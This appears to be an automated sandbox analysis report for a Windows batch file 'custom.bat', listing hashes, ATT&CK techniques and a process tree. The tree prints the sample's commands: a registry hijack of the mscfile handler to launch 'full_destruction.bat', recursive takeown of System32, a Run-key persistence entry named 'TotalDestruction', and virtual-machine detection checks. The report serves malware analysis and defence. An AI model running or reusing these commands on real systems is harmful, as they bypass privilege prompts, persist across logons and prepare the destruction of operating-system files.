396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e

Analysis

max time kernel
146s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
08/09/2024, 06:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom.bat
Size

4KB
MD5

1c63745d54962d205bb3ae879bea1ed4
SHA1

a832c894a4e2b6d486c48b9ea6ec79d94df9537e
SHA256

396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
SHA512

129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
SSDEEP

96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Score

7^/10

discovery execution persistence

Malware Config

Signatures

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
288	takeown.exe
2036	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat"	reg.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1300	tasklist.exe
1328	tasklist.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2712	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
108	timeout.exe
1756	timeout.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1768	systeminfo.exe
560	systeminfo.exe
684	systeminfo.exe

Modifies registry class 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell	reg.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2712	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeTakeOwnershipPrivilege	288	takeown.exe
Token: SeDebugPrivilege	1300	tasklist.exe
Token: SeDebugPrivilege	1328	tasklist.exe
Token: SeTakeOwnershipPrivilege	2036	takeown.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 2080 wrote to memory of 2692	2080	cmd.exe	31
PID 2080 wrote to memory of 2692	2080	cmd.exe	31
PID 2080 wrote to memory of 2692	2080	cmd.exe	31
PID 2080 wrote to memory of 2712	2080	cmd.exe	32
PID 2080 wrote to memory of 2712	2080	cmd.exe	32
PID 2080 wrote to memory of 2712	2080	cmd.exe	32
PID 2080 wrote to memory of 108	2080	cmd.exe	34
PID 2080 wrote to memory of 108	2080	cmd.exe	34
PID 2080 wrote to memory of 108	2080	cmd.exe	34
PID 2080 wrote to memory of 2060	2080	cmd.exe	35
PID 2080 wrote to memory of 2060	2080	cmd.exe	35
PID 2080 wrote to memory of 2060	2080	cmd.exe	35
PID 2080 wrote to memory of 568	2080	cmd.exe	36
PID 2080 wrote to memory of 568	2080	cmd.exe	36
PID 2080 wrote to memory of 568	2080	cmd.exe	36
PID 2080 wrote to memory of 1756	2080	cmd.exe	37
PID 2080 wrote to memory of 1756	2080	cmd.exe	37
PID 2080 wrote to memory of 1756	2080	cmd.exe	37
PID 568 wrote to memory of 288	568	cmd.exe	39
PID 568 wrote to memory of 288	568	cmd.exe	39
PID 568 wrote to memory of 288	568	cmd.exe	39
PID 2080 wrote to memory of 2332	2080	cmd.exe	40
PID 2080 wrote to memory of 2332	2080	cmd.exe	40
PID 2080 wrote to memory of 2332	2080	cmd.exe	40
PID 2080 wrote to memory of 684	2080	cmd.exe	41
PID 2080 wrote to memory of 684	2080	cmd.exe	41
PID 2080 wrote to memory of 684	2080	cmd.exe	41
PID 2080 wrote to memory of 1912	2080	cmd.exe	42
PID 2080 wrote to memory of 1912	2080	cmd.exe	42
PID 2080 wrote to memory of 1912	2080	cmd.exe	42
PID 2080 wrote to memory of 1768	2080	cmd.exe	45
PID 2080 wrote to memory of 1768	2080	cmd.exe	45
PID 2080 wrote to memory of 1768	2080	cmd.exe	45
PID 2080 wrote to memory of 908	2080	cmd.exe	46
PID 2080 wrote to memory of 908	2080	cmd.exe	46
PID 2080 wrote to memory of 908	2080	cmd.exe	46
PID 2080 wrote to memory of 560	2080	cmd.exe	47
PID 2080 wrote to memory of 560	2080	cmd.exe	47
PID 2080 wrote to memory of 560	2080	cmd.exe	47
PID 2080 wrote to memory of 1836	2080	cmd.exe	48
PID 2080 wrote to memory of 1836	2080	cmd.exe	48
PID 2080 wrote to memory of 1836	2080	cmd.exe	48
PID 2080 wrote to memory of 1300	2080	cmd.exe	49
PID 2080 wrote to memory of 1300	2080	cmd.exe	49
PID 2080 wrote to memory of 1300	2080	cmd.exe	49
PID 2080 wrote to memory of 2416	2080	cmd.exe	50
PID 2080 wrote to memory of 2416	2080	cmd.exe	50
PID 2080 wrote to memory of 2416	2080	cmd.exe	50
PID 2080 wrote to memory of 1328	2080	cmd.exe	51
PID 2080 wrote to memory of 1328	2080	cmd.exe	51
PID 2080 wrote to memory of 1328	2080	cmd.exe	51
PID 2080 wrote to memory of 1084	2080	cmd.exe	52
PID 2080 wrote to memory of 1084	2080	cmd.exe	52
PID 2080 wrote to memory of 1084	2080	cmd.exe	52
PID 2080 wrote to memory of 1772	2080	cmd.exe	53
PID 2080 wrote to memory of 1772	2080	cmd.exe	53
PID 2080 wrote to memory of 1772	2080	cmd.exe	53
PID 2080 wrote to memory of 2036	2080	cmd.exe	54
PID 2080 wrote to memory of 2036	2080	cmd.exe	54
PID 2080 wrote to memory of 2036	2080	cmd.exe	54

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2080
- C:\Windows\system32\mode.com
  mode con: cols=800 lines=60
  2⤵
  PID:2692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2712
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:108
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
  2⤵
  - Modifies registry class
  PID:2060
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:568
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\* /r /d y
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:288
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1756
- C:\Windows\system32\reg.exe
  reg delete "HKCU\Software\Classes\mscfile" /f
  2⤵
  - Modifies registry class
  PID:2332
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:684
- C:\Windows\system32\findstr.exe
  findstr /i "VirtualBox"
  2⤵
  PID:1912
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:1768
- C:\Windows\system32\findstr.exe
  findstr /i "VMware"
  2⤵
  PID:908
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:560
- C:\Windows\system32\findstr.exe
  findstr /i "Hyper-V"
  2⤵
  PID:1836
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\system32\findstr.exe
  findstr /i "vmsrvc.exe"
  2⤵
  PID:2416
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:1328
- C:\Windows\system32\findstr.exe
  findstr /i "VBoxService.exe"
  2⤵
  PID:1084
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
  2⤵
  - Adds Run key to start application
  PID:1772
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\System32\* /r /d y
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\full_destruction.bat

Filesize
285B

MD5
4577f08330df24a350ff523ec87bf38e

SHA1
5bd1a1b1b8ca3b007102a75f7abaf72348955cf2

SHA256
5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae

SHA512
ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2

Download Submit
memory/2712-4-0x000007FEF5A8E000-0x000007FEF5A8F000-memory.dmp

Filesize
4KB

Download
memory/2712-5-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2712-6-0x0000000002960000-0x0000000002968000-memory.dmp

Filesize
32KB

Download
memory/2712-7-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-8-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-9-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-10-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-11-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download
memory/2712-12-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

Filesize
9.6MB

Download